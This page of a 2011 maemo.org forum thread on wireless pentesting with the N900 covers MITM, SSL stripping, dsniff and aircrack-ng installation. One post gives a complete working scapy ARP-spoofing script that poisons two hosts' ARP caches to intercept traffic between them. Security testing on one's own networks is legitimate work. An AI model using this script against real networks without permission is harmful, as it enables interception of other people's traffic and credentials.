[Tutorial] Pentesting Wireless Networks - Page 3 - maemo.org

Active Topics

HDMI with Leste (1)
to Maemo 7 / Leste by teroyk - 1 day, 15 hrs ago
Firefox with Leste (9)
to Maemo 7 / Leste by teroyk - 3 days, 17 hrs ago
more...

Page 3 of 30

< Prev

Next >

Last »

Thread Tools

	casper27	2011-05-30 , 18:13
	Posts: 844 \| Thanked: 521 times \| Joined on Jan 2009 @ UK southampton	#21

I am quite suprised by how well the N900 handles mitm attacks. SSL stripping works great aswell.
@karam
I uninstalled all my maemo "security testing progs" and ran through your guide. All installed correct. Small spelling mistake at end:-

mv cowpatty /usr/bib

Good work, be prepared for alot of questions though, you've opened the box now

Quote & Reply |

The Following User Says Thank You to casper27 For This Useful Post:
q6600

peppino	2011-05-30 , 18:21
Posts: 19 \| Thanked: 16 times \| Joined on Sep 2010	#22

For replace arpspoof I developed a simple scapy script. I hope is usefull.
I need to improve it. It takes 2 arguments, 2 ip for sniff packets between them. With one ip it sniff packets beetween the ip and the gateway of the network.

Code:

#!/usr/bin/env python

import os
import sys
import time
from scapy.all import sendp,Ether,ARP,conf,getmacbyip,get_if_hwaddr

conf.verb = 0

# Disable ICMP Redirects
f = open('/proc/sys/net/ipv4/conf/' + conf.iface + '/send_redirects','w')
f.write('0')
f.close()

# Forward packets
f = open('/proc/sys/net/ipv4/ip_forward','w')
f.write('1')
f.close()
 
# Target's details
sIP1 = sys.argv[1]
sMAC1 = getmacbyip(sIP1)

if len(sys.argv) > 2:
    sIP2 = sys.argv[2]
else:
    # Get GW
    sIP2 = conf.route.route("0.0.0.0")[2]
sMAC2 = getmacbyip(sIP2)

sMyMac = get_if_hwaddr(conf.iface)
 
# Time between ARP packets
sleep_time = 3

# Construct the Arp packet and Ethernet frame
objARP1 = ARP(hwsrc=sMyMac, pdst=sIP1, psrc=sIP2, op=1)
objFrame1 = Ether(dst=sMAC1)

objARP2 = ARP(hwsrc=sMyMac, pdst=sIP2, psrc=sIP1, op=1)
objFrame2 = Ether(dst=sMAC2)

try:
    while True:
        # Send the packet
        sendp(objFrame1 / objARP1)
        sendp(objFrame2 / objARP2)
        os.write(1,'.')
        # Wait for the specified time
        time.sleep(sleep_time)
except KeyboardInterrupt:
    # Restore original MAC
    objARP1.hwsrc = sMAC2
    objARP2.hwsrc = sMAC1
    sendp(objFrame1 / objARP1)
    sendp(objFrame2 / objARP2)
    os.write(1,"\n")
    pass

Quote & Reply |

The Following 6 Users Say Thank You to peppino For This Useful Post:
Estel, jberezhnoy, karam, laasonen, Mentalist Traceur, nafajafam

karam	2011-05-30 , 19:03
Posts: 856 \| Thanked: 1,681 times \| Joined on Apr 2010 @ Aleppo ,Syria	#23

Well pretty nice i will test it and post it in the first post (as provided by you)

And ppl this is a shared thread to make n900 super hacking tool

So anyone got beautifull scripts that works on n900 let him post them

Quote & Reply |

The Following User Says Thank You to karam For This Useful Post:
abubakar

karam	2011-05-30 , 19:04
Posts: 856 \| Thanked: 1,681 times \| Joined on Apr 2010 @ Aleppo ,Syria	#24

@casper27
Thank you for attentioning me i fixed the error thanks

Quote & Reply |

q6600	2011-05-31 , 18:21
Posts: 146 \| Thanked: 39 times \| Joined on May 2010	#25

Originally Posted by casper27

I am quite suprised by how well the N900 handles mitm attacks. SSL stripping works great aswell.
@karam
I uninstalled all my maemo "security testing progs" and ran through your guide. All installed correct. Small spelling mistake at end:-

mv cowpatty /usr/bib

Good work, be prepared for alot of questions though, you've opened the box now

Many thx for your time.
The mitm attacks works just fine

Quote & Reply |

awett	2011-06-01 , 10:54
Posts: 50 \| Thanked: 16 times \| Joined on May 2011	#26

apt-get install libssl0.9.8
ln -s /usr/lib/libssl.so.0.9.8 /usr/lib/libssl.so.0.9.7
ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.0.9.7

this dose not help for me still dsniff is not installabel
:-(

Quote & Reply |

karam	2011-06-01 , 13:26
Posts: 856 \| Thanked: 1,681 times \| Joined on Apr 2010 @ Aleppo ,Syria	#27

Originally Posted by awett

apt-get install libssl0.9.8
ln -s /usr/lib/libssl.so.0.9.8 /usr/lib/libssl.so.0.9.7
ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.0.9.7

this dose not help for me still dsniff is not installabel
:-(

sry for taking so long to reply
HMM well just wait about 1 hour until i reprepare my n900
and i will grab the debs from it and post it in the first post

looks like dsniff doesn't detect them
and don't worry just install the debs im gonna put in the attachments
they will replace the libssl.so.0.9.7 and libcrypto.so.0.9.7

Quote & Reply |

The Following User Says Thank You to karam For This Useful Post:
shawwawa

karam	2011-06-01 , 14:54
Posts: 856 \| Thanked: 1,681 times \| Joined on Apr 2010 @ Aleppo ,Syria	#28

Updated to solve dsniff problems please check

Quote & Reply |

The Following User Says Thank You to karam For This Useful Post:
shawwawa

Mentalist Traceur	2011-06-02 , 01:37
Posts: 2,225 \| Thanked: 3,822 times \| Joined on Jun 2010 @ Florida	#29

Hey, just FYI for your tutorial, you can remove the symlinking instructions for aircrack-ng.

As I'm the current maintainer of the aircrack-ng package, I have implemented both optification of the binaries (so they no longer get installed to /usr/local/[s]bin/ anyway), and symlinking them into the default path (to /usr/[s]bin/) now happens automatically too.

Originally Posted by factobrah

is it the same as in the aircrack-ng 1.1 ? coz i'v tried it yesterday and it's keep freezing

You could, you know, post in the Aircrack-NG 1.1 thread that you're experiencing this bug. Also, if you're using it with faircrack or some other scripts, instead of directly, it's possible the freezes are because of the above mentioned installation path changes.